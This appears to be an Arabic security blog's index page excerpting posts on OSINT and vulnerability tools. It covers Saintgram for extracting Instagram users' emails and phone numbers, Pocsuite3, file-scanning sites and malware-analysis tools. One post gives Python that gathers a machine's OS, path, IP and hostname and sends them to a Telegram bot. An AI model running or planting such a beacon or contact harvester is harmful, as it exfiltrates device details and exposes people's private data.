المشاركات

عرض الرسائل ذات التصنيف osint tools

أداة Saintgram: استخراج معلومات حسابات Instagram بسهولة

صورة
Mr. RedRaccoon Saintgram هي أداة مكتوبة بلغة Python مصممة لاستخراج معلومات حسابات Instagram، بما في ذلك البريد الإلكتروني المشفر وأرقام الهواتف، بالإضافة إلى قوائم المتابعين والمتابَعين. الميزات: استرجاع معلومات الحساب الأساسية مثل اسم المستخدم، المعرف، وعدد المتابعين. استخراج البريد الإلكتروني المشفر وأرقام الهواتف. عرض قوائم المتابعين والمتابَعين مع معلومات الاتصال. تدعم واجهة سطر الأوامر لتسهيل الاستخدام. التثبيت: لتثبيت الأداة، اتبع الخطوات التالية: استنساخ المستودع: git clone https://github.com/joe444-pnj/saintgram.git $ $ cd saintgram تثبيت الحزم المطلوبة: pip install -r requirements.txt $ python main.py $ To Retrieve The Session ID

أفضل المواقع لفحص الملفات والروابط للتأكد من أمانها

صورة
Mr.  RedRaccoon السلام عليكم ورحمة الله وبركاته، إليكم قائمة بأدوات ومواقع فحص الملفات والروابط لمساعدتكم في تأمين وتحليل المحتوى الرقمي: VirusTotal يقوم بفحص الروابط والملفات باستخدام حوالي 67 محرك حماية من البرمجيات الخبيثة. يقدم معلومات أساسية عن الملف أو الرابط ويربطه بملفات أخرى ويعرض آراء المستخدمين. Hybrid Analysis يقوم بفحص الملفات بإرسالها إلى VirusTotal ويدرس نشاط الملف باستخدام نظام Falcon Sandbox. Malwr يفحص الملفات من خلال إرسالها إلى VirusTotal ويدرس نشاط الملف باستخدام نظام Cuckoo Sandbox. يقدم نتائج مفصلة، ولكن الموقع تحت الصيانة حالياً. Any.Run يتيح للمستخدم رفع أي ملف واستعراضه على نظام Windows 7 وهمي بشكل مجاني، أو على أنظمة أخرى بشكل مدفوع. URLVoid يقوم بفحص الروابط من خلال البحث في تصنيفات القوائم السوداء وسمعة الروابط على الإنترنت. SiteCheck يفحص الروابط بحثاً عن برمجيات خبيثة معروفة، القائمة السوداء، أخطاء في الموقع، أو برمجيات غير محدثة. IsItHacked يتحقق من ما إذا كان الرابط محجوباً على خدمة GoogleBot، يحتوي على روابط غير مرغوب فيها، أو يقوم بعمليات إعادة تو...

سكربت بسيط لجمع المعلومات باستخدام بايثون

صورة
Mr.  RedRaccoon آلية عمل السكربت: استيراد المكتبات: يتم استيراد المكتبات اللازمة مثل os , sys , platform , socket , requests , و datetime . تعريف المتغيرات: TOKEN : رمز البوت الخاص بك على تيليجرام. ID : معرف تيليجرام الخاص بك. OS_Name : اسم نظام التشغيل. OS_Version : إصدار نظام التشغيل. Path : المسار الحالي. Time : الوقت الحالي. Ip : عنوان IP للجهاز. host : اسم المضيف. Dev : اسم المطور (يمكن تغييره). TOKEN = "Your BOT Token" ID = "Your Telegram Id" OS_Name = platform.system() OS_Version = platform.release() Path = sys.path[ 0 ] Time = str (datetime.now()) Ip = requests.get( "https://api.ipify.org" ).text host = socket.gethostbyname(socket.gethostname()) Dev = "@MrRedRaccon" إرسال المعلومات إلى تيليجرام: يتم إنشاء رابط لإرسال رسائل تيليجرام باستخدام TOKEN ، ويتم إنشاء قاموس يحتوي على معلومات حول نظام التشغيل والجهاز والوقت والمسار الحالي. يتم إرسال هذه المعلومات إلى حساب تيليجرام باستخدام API من خلال طلب POST. Url = "https://api.telegram.org/...

كيفية تثبيت أداة Pocsuite3

صورة
Mr.  RedRaccoon 1. التحقق من تثبيت Python: تأكد من أن Python مثبت على جهازك قبل البدء في تثبيت الأداة. 2. استخدام بيئة افتراضية (Virtualenv): يُفضل استخدام بيئة افتراضية للحفاظ على بيئة Python منفصلة وتجنب تعارضات الحزم. تثبيت Virtualenv: $ pip install virtualenv 3. إنشاء بيئة افتراضية جديدة: يمكنك إنشاء بيئة افتراضية باسم تريده: $ virtualenv pocsuite يمكنك استبدال pocsuite بأي اسم تختاره. 4. تنشيط البيئة الافتراضية: لنظام Windows: $ pocsuite\Scripts\activate لنظام Linux/Mac: $ source pocsuite/bin/activate بعد تنفيذ الأمر المناسب لنظامك، ستلاحظ أن البيئة قد تم تفعيلها بنجاح. 5. تثبيت Pocsuite3: قم بتثبيت الأداة باستخدام pip: $ pip install pocsuite3 ستقوم هذه العملية بتحميل وتثبيت Pocsuite3 وجميع المكتبات المطلوبة تلقائيًا. 6. بدء استخدام Pocsuite3: لاختبار أحد تطبيقات الويب، استخدم الأمر التالي: $ pocsuite -r [poc_file] -u [url] استبدل [poc_file] بمسار ملف الـ POC الخاص بك و [url] بعنوان الهدف الذي تريد اختباره. شرح الأداة: لمزيد من المعلومات حول استخدام الأداة، يمكنك مشاهدة ال...

Pocsuite3: اكتشاف الثغرات بأسلوب حيوي وفعّال

صورة
Mr.  RedRaccoon في عصر الابتكار التكنولوجي، يلتزم الباحثون والمحترفون في مجال أمان المعلومات بالبحث عن أدوات فعّالة تسهم في اكتشاف الثغرات وتحسين أمان النظم. إحدى هذه الأدوات الرائدة هي Pocsuite3، والتي تأتي بأسلوب حيوي لتحقيق الأمان بشكل مبتكر. Pocsuite3: أداة التصدي للثغرات بشكل متقدم Pocsuite3 هي أداة متقدمة في مجال اكتشاف الثغرات، وتبرز بفعاليتها العالية وسهولة استخدامها. تم تطويرها لتلبية احتياجات المتخصصين في أمان المعلومات الذين يسعون لتحسين أمان النظم وتقوية خطوط الدفاع السيبرانية. ميزات رائدة في مجال الأمان: اكتشاف تلقائي: Pocsuite3 تأتي مع قدرة فائقة في اكتشاف التهديدات تلقائيًا، مما يسهل على المستخدمين العثور على الثغرات دون جهد زائد. تحليل شامل: تقدم الأداة تحليلًا شاملاً للثغرات المكتشفة، مما يساعد في تحديد وفهم جميع جوانب الهجوم المحتملة. دعم للثغرات المتقدمة: تستهدف Pocsuite3 ليس فقط الثغرات الأساسية ولكن أيضًا الثغرات المتقدمة، مما يجعلها أداة قوية ومتعددة الاستخدامات. سهولة الاستخدام: بفضل واجهة المستخدم البسيطة والواضحة، يمكن للمستخدمين بسهولة الاستفادة من قوة...

أدوات لتحليل البرامج الضارة (Malware Analysis)

صورة
Mr.  RedRaccoon - أداة Process Hacker   أداة مجانية متعددة الأغراض تساعد في مراقبة موارد النظام وتصحيح البرامج واكتشاف البرامج الضارة. تمكن من قراءة العمليات المتعلقة ببرامج الفدية وملفات تعليمات فك التشفير، وتحديد عنوان IP الخاص بالبرامج الضارة. - أداة Process Monitor  تُستخدم لإنشاء أوضاع تصفية لمراقبة البرامج الضارة عبر مراقبة العمليات. تمكّن من تحديد جميع العمليات التي تم إنشاؤها حديثًا وكذلك جميع وسائط سطر الأوامر لتلك العمليات. - أداة CaptureBat  أداة سهلة الاستخدام لمراقبة الملفات الخبيثة والشبكة المستخدمة. تتيح التقاط جميع الملفات التي تم تعديلها أو إنشاؤها حديثًا على القرص. - أداة Microsoft Network Monitor  تساعد في تحديد العمليات التي تؤسس اتصالات مع المضيفين البعيدين. عند تحميل الأداة، يمكن تشغيلها بصلاحيات Root لاستخدامها بكفاءة. - أداة Autoruns   تمكّن من التعامل مع البرامج التي تعمل تلقائيًا عند إقلاع الويندوز، وتعرض الخدمات المخفية التي تعمل عند بدء النظام. تتيح أيضًا مراقبة نسبة استهلاك الموارد من قِبل تلك الخدمات.